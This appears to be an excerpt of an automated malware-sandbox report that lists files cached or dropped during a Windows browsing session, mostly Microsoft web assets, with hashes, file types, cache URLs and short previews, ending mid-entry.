                                                                                                                                                                                                              SSDEEP:1536:zHmIRldFIJ9Zm4nzKF5ZHmKh1LGYhz3jEj9TNfHx7EmI9o/L2RP1UWWTsyF2kkNR:zlRldwLU2Y0L2RP1UWWTgt2hmqu
                                                                                                                                                                                                              MD5:94E9F61BA4A75EEA1AE8BE5B77A740CA
                                                                                                                                                                                                              SHA1:D08E9A89A442724DD67F4C694D299FB41393139F
                                                                                                                                                                                                              SHA-256:22B1FC82DF335CD1986B2DDB73CB3194AE14B6C9BA38F91818081F78054DB285
                                                                                                                                                                                                              SHA-512:D678F58DACDF54B2CB4DF85ED6A6F19CD3E4E494E6735DA7C2CACAE0170A07D29C26271795039635631DE406A34CCF5BB1D61FEC9755020C763D32A690ADE0EB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="de-ch" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;609f6602-9772-4306-b83c-1518565a3761&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;de-ch&quot;,&quot;l&quot;:&quot;de-ch&quot;,&quot;mu&quot;:&quot;de-ch&quot;,&quot;rp&quot;:&quot;/de-ch/microsoft-365/microsoft-office&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title>Microsoft Office geh&#246;rt
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mwf-main.min[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):838013
                                                                                                                                                                                                              Entropy (8bit):5.103129121399889
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:/EZACjZ9dyG1lBNZF6Z95+KpZ93+KmzvpRdU6mM+SMGquOa2+KT3zt/zXtRNtRQs:/EZxewPscLEXGE
                                                                                                                                                                                                              MD5:348AFBD3BFCB50D1C34230FE71DCB036
                                                                                                                                                                                                              SHA1:BA76742A8DFEDB4583CC1DD4239C5E4945422C19
                                                                                                                                                                                                              SHA-256:FC708C1B4DA356D1CA8FB111AEDC243DFCFF8DF017A983908CEF5A1A58DB3642
                                                                                                                                                                                                              SHA-512:93759F8BA012EC536C7D40450BF02976058F001E8C69416723798A03D7539FCFDA879EA59B9F229AAFF913F285D1A819D86DF79A176F626D62EEF879D58EC841
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mwf-service.akamaized.net/mwf/css/bundle/1.58.0/west-european/default/mwf-main.min.css
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.58.0 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mwfmdl2-v3.54[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):26288
                                                                                                                                                                                                              Entropy (8bit):7.984195877171481
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                                                                                                                              MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                                                                                                              SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                                                                                                              SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                                                                                                              SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                                                                                                                              Preview: wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\override[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1531
                                                                                                                                                                                                              Entropy (8bit):4.797455242405607
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Udf0F+MOu2UOqD3426TKgR2Yyk9696TkMYqdfskeEkeGk/ksuF9qaSm9qags:Ud8FYqTj36TKgR2Yyk9696TkMYO0keEW
                                                                                                                                                                                                              MD5:A570448F8E33150F5737B9A57B6D889A
                                                                                                                                                                                                              SHA1:860949A95B7598B394AA255FE06F530C3DA24E4E
                                                                                                                                                                                                              SHA-256:0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
                                                                                                                                                                                                              SHA-512:217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                                                                                                                              Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\print[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                              Entropy (8bit):7.004897375379158
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPkR/C+k790OCotr/vbXX3PHrLiBxwGFhGsznYUAlnEkPb6PL2+/pTp:6v/78/v4rrXX3u1XYRm4byp9
                                                                                                                                                                                                              MD5:290AFB4165DD808A850D8920AEB5DBF4
                                                                                                                                                                                                              SHA1:0B4BF844AED3A740A99B7415F6BD803E84DDDA4D
                                                                                                                                                                                                              SHA-256:882FDB8A4BF176D2A09427D6A5BDBA3051307F2605090DA848085B0D78B6FD99
                                                                                                                                                                                                              SHA-512:197AD95E98C04B26AAD845DF7FF5C3C2CC6020E5273526970261F30A8EEAAB30A1C0DDC2BAE1D654095E8D47D399CCB526B32AD7CBE84CB1140E2D5F5142A7DB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/print.png?version=81dae466-5035-741c-3caa-426a84bf5915
                                                                                                                                                                                                              Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O..=..0...\.+....{......A.qQ..*.....&.l.....4i.7MM$u..:b&5..F.2.q....%3L.K..,..2C....c?+.{....B7i~R..0;.r..C.c....$....Jx.^8.O.l.!E).#l...e..#.k/...y.D..%<.<......4\.2H..0.>...WY9giK,la/....p<...4%...N..-I..._%...s1....P.......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\promotionBanner[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3077
                                                                                                                                                                                                              Entropy (8bit):5.234275737002789
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ybkw30eqWN9CVwpnDEXoXQnkm9yJvsWOL:ab30eqWN9CVBYXuyls7L
                                                                                                                                                                                                              MD5:B35BA1363EF3C2A909243EEFC52208DB
                                                                                                                                                                                                              SHA1:A664CF9D4428D4F6510640E111DF454F28102DB1
                                                                                                                                                                                                              SHA-256:49F084779AF97B8D24F70CC40A5CE9CC4F724D3ACCB2513B4170913D7D0D1992
                                                                                                                                                                                                              SHA-512:0BBA88DCDE5D88026835A5997E3A55B9709AEB1C28F122206323BCCE3CE46341767DE06F0A747B1008ED198210A172B9E980B0559026B054205CBC1BDFE82A83
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/js/promotionBanner.js?v=SfCEd5r5e40k9wzEClzpzE9yTTrMslE7QXCRPX0NGZI
                                                                                                                                                                                                              Preview: /*! Copyright (C) Microsoft. All rights reserved. */....$(function ($) {...var dismissedBannerSet = {};...var banners = [....{.....'dismissElement': '#uhf-banner-close',.....'clickElement': '#upgradeUhfBannerButton',.....'element': '#uhf-upgrade-banner'....},....{.....'dismissElement': '',.....'clickElement': '#rail-banner-button',.....'element': '#rail-banner'....},....{.....'dismissElement': '',.....'clickElement': '#upgradeBannerButtonLink',.....'element': '.upgradeBanner'....}...];.....function initializeAwaTags($this, defaultValue) {....return {.....content: {......areaName: $this.data("bi-area") || defaultValue,......contentId: $this.data("bi-id") || defaultValue,......scn: $this.data('bi-scn') || defaultValue,......containerName: 'growth_placement',......contentName: [.......($this.data('bi-title') || "").replace("|", " "),.......($this.data('bi-subtext') || "").replace("|", " "),.......($this.data('bi-button') || "").replace("|", " ")......].join('|').....}....};...};.....funct
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].htm
                                                                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):325
                                                                                                                                                                                                              Entropy (8bit):5.200404254199348
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:hn8FHdCc4svquXI9cn4mc4sLVHclZAEdp8nPbeDPOCdPUmX4QL:hnM9iuXI9/VSAEd8PyDPO4wQL
                                                                                                                                                                                                              MD5:8A951169902AE060227EEF9DB9762CD3
                                                                                                                                                                                                              SHA1:A05BBC89FA060845BD266E46D660F1AB920CBB56
                                                                                                                                                                                                              SHA-256:9ACED9991A58BA6D0A7A47C24FBFB2B8C278BEE11CFEC4169B44692A0C20E206
                                                                                                                                                                                                              SHA-512:D68670D456DEA33575B0A259A3BDB46E235C19EA53AC000DD3FE5CC5B6FE7086F0A571C832A4AE05850710FE91D610E61E837FC743399FC6AC398B29AFA6EB52
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml"> . <head>. <title>Moved</title>. </head>. <body>. <p>This item has moved <a href="https://go.microsoft.com/fwlink/?LinkId=691209">here</a>.</p>. </body>.</html>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sale[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):501307
                                                                                                                                                                                                              Entropy (8bit):5.241710425775769
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:tlRCHez5P3fG5WLUvY/a7YTpJqWnGGVnxr4qW2dZt5:Xjz5P3fG0LkY/1pHr4qBf
                                                                                                                                                                                                              MD5:22CE3F338722E5A5DC89F778E3B6DA95
                                                                                                                                                                                                              SHA1:6A7E15B9823912BE0862DCA37CF678F7832E9EDB
                                                                                                                                                                                                              SHA-256:D0D247B4B86845E9B1EB93836B90C2AAC5A39339466A8FF9A0997AAF2B8EE70D
                                                                                                                                                                                                              SHA-512:F5CA30F3F05D880AD12ACD4CC4E3C37F805793FE11654512667D8B3806A258D89BA7F1F5191E66B8185203F22B23B17B8A66234172CD3DD94411DD3850A4FB07
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7781.41778&quot;,&quot;a&quot;:&quot;a3adbabe-eb8e-4896-96ae-5ddcf6bfa28a&quot;,&quot;cn&quot;:&quot;55&quot;,&quot;az&quot;:&quot;{did:9a8cd53207774949b337f7edab013e9f, rid: 55, sn: storeexp-neu-prod, dt: 2021-05-10T02:39:33.3812639Z, bt: 2021-04-21T23:12:36.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;store-web-default&quot;,&quot;m&quot;:&quot;en-us&quot;,&quot;l&quot;:&quot;en-us&quot;,&quot;mu&quot;:&quot;en-us&quot;,&quot;rp&quot;:&quot;/en-us/store/b/sale&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title>Microsoft Store Deals: Computer Sales &amp; Laptop Deals . Microsoft</title>..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\shell.min[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):82190
                                                                                                                                                                                                              Entropy (8bit):5.036904170769404
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tJzwN0CbUTqI34/9w6/Qua+1IGEbjBko230WBYT:vyA
                                                                                                                                                                                                              MD5:1F9995AB937AC429A73364B4390FF6E8
                                                                                                                                                                                                              SHA1:81998DCC6407CEB5CEF236AD52B9F2A3A9528D3B
                                                                                                                                                                                                              SHA-256:49E5166F40D8586714F86E08AB76A977199DF979357147A0E81980A804151C2A
                                                                                                                                                                                                              SHA-512:6669AE352FF46DB734BB8F973D1C0527C3A5EC4119D534AAE4C33F29EFF970168ED5FE200A05D4E1B6A2EC0E090E2207549B926317D489DC7664B0D9C2085465
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/onestorerolling-1510-19009/shell/v3/scss/shell.min.css
                                                                                                                                                                                                              Preview: @charset "UTF-8";@font-face{font-family:'wf_segoe-ui_normal';src:local("Segoe UI");src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");font-weight:normal;font-style:normal}@font-face{font-family:'wf_segoe-ui_semilight';src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.eot");src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.eot?#iefix") format("embedded-opentype"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.woff") format("woff"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.ttf")
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skiptomain[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):406408
                                                                                                                                                                                                              Entropy (8bit):5.015895895942093
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:aAwmeEZACGnzyP5kTP3bI0tfYqQ0xtLfj4ZDa813giY8R1j35Ap7zzN1n1JKfNPb:2EZACN
                                                                                                                                                                                                              MD5:1E7C761BF4B5BAE13B5E9B83D6ACD048
                                                                                                                                                                                                              SHA1:E27CC7DD26A34C17287EC7C3A924797E3FEB66C7
                                                                                                                                                                                                              SHA-256:D7F468D9227C0D6A3BFAE04EED006E939033E40EC5BAE512B34D526D7A8B9CA3
                                                                                                                                                                                                              SHA-512:60504F13B0067EE0F94D530F692BCE4DE1BCE02EB2D9A81910A785D75BE6E698107C152BF6695E25E810D356B3636BC1DF198C26FA7CDEA1BE2000FAC7FB7DC6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20200416_22921869/west-european/store-web-default/alert/areaheading/autosuggest/channelplacement/channelplacementitem/contentplacement/contentplacementitem/contentrichblock/dialog/flipper/flyout/glyph/heading/highlightfeature/hyperlinkgroup/image/list/pagebehaviors/singleslidecarousel/skiptomain?apiVersion=1.0&include_base=true
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.57.0 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\smc-hero[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=19, height=4800, bps=242, PhotometricIntepretation=RGB, manufacturer=LEICA CAMERA AG, model=LEICA SL (Typ 601), orientation=upper-left, width=7200], baseline, precision 8, 2006x426, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):288635
                                                                                                                                                                                                              Entropy (8bit):7.8730773979077915
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:NFdXn8KMkHjxPiut9ROZCdoUewqIaTi7aZH:NFO8jxKut9Rf2lwhZ7at
                                                                                                                                                                                                              MD5:DAED253FD2300C7A11E579FE5E756AEC
                                                                                                                                                                                                              SHA1:78BDEDCAD19EB8C6E2DFC11DFA23061FD59FC326
                                                                                                                                                                                                              SHA-256:22D25AEAC8B0C66A9DD1CE0267F37AB9612B995383387E23E936E1F36261E555
                                                                                                                                                                                                              SHA-512:F1C82975CFA9B1CF5CDA6C1C450E40EDF2AB2981943657650E5EF075DC1822B5291B328D31DB0E5B11D54CEE85AC1FD23C774EC948E05AE68ABB21DB74D58A0C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/smc-hero.jpg
                                                                                                                                                                                                              Preview: ....%.Exif..II*............... ...........................................................................................................#...(...........1..."...+...2.......M...;.......a.......h...m.......&...........X.......i.......T...%.....................LEICA CAMERA AG.LEICA SL (Typ 601)......'.......'..Adobe Photoshop CC 2019 (Windows).2020:04:15 01:04:19.doug menuez.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.1.2">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="Leica Camera AG". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:aux="http://ns.adobe.com/exif/1.0/aux/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmp:CreateDate="2019-03-02T16:56:27". xmp:CreatorTool="Capture One Pro 11.3.2 Windows". tiff
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\social[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):405240
                                                                                                                                                                                                              Entropy (8bit):5.008897420486304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:DAwmeEZACGczyP5kTP3bI0tfYqQ0xtLfj4ZDa813giY8R1j35Ap7zzN1n1JKfNkJ:jEZACNj
                                                                                                                                                                                                              MD5:D8A72502738BFCFD2C097C118717EA48
                                                                                                                                                                                                              SHA1:A06B405EAAFE69B9D642DADA0B76882F18239C06
                                                                                                                                                                                                              SHA-256:445C31D64BAF3FAEC4A88EAACAC22FA6AAC1F01E2458EBA1F5CC654942F8EA97
                                                                                                                                                                                                              SHA-512:30233A183154B5E76AA2539D5A8C8997DAF1A64EDA97668EAF387BD060A732B75DBA1C49AFE49A7B68EF83CB1F55EBA53A001865DF808102906560F1E4F857CF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20210208_31270267/west-european/default/alert/autosuggest/contentplacement/contentplacementitem/flipper/flyout/glyph/heading/hero/heroitem/hyperlinkgroup/image/list/pagebehaviors/singleslidecarousel/skiptomain/social?apiVersion=1.0&include_base=true
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.58.2 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\social[2].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):528211
                                                                                                                                                                                                              Entropy (8bit):4.993867960528014
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:DAwmeEZACGczyP5kTP3bI0tfYqQ0xtLfj4ZDa813giY8R1j35Ap7zzN1n1JKfNk7:jEZACsej
                                                                                                                                                                                                              MD5:494A48797CEC451AD0299C0CF97493BA
                                                                                                                                                                                                              SHA1:C9AB59A42E68DB8FE0C42AA47BEF794071509DE4
                                                                                                                                                                                                              SHA-256:FBE38C0C92996AA58C3E7067E78E4B630EBBF519C3577B5B647F34CEC36839AB
                                                                                                                                                                                                              SHA-512:76CBFA3BE590670B64233EDA98FB3BB9012E1F7DF64095A202B1CFE88AAB8A22950DD9E6A1DD23EA32B2D679F6F63E7FDB758771477F3659B62F7E138DBCB74F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20210208_31270267/west-european/default/alert/ambientvideo/areaheading/autosuggest/button/calltoaction/dialog/divider/feature/glyph/heading/hero/heroitem/hyperlinkgroup/image/imageintro/list/logo/mosaic/mosaicplacement/multislidecarousel/pagebehaviors/rating/skiptomain/slider/social?apiVersion=1.0&include_base=true
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.58.2 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\style[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):979
                                                                                                                                                                                                              Entropy (8bit):4.957482467819343
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Cn5ZoK2kTL01MCJZ4ZVaeao1DphsILHJNM2WXgEXgf0Xgm:u5d8pJZ4+BWIIPLQ73/
                                                                                                                                                                                                              MD5:B4477ABE2C9D12A8E10E11928E504297
                                                                                                                                                                                                              SHA1:19A176757F612216F0230DE4A3D3F95D68F175B1
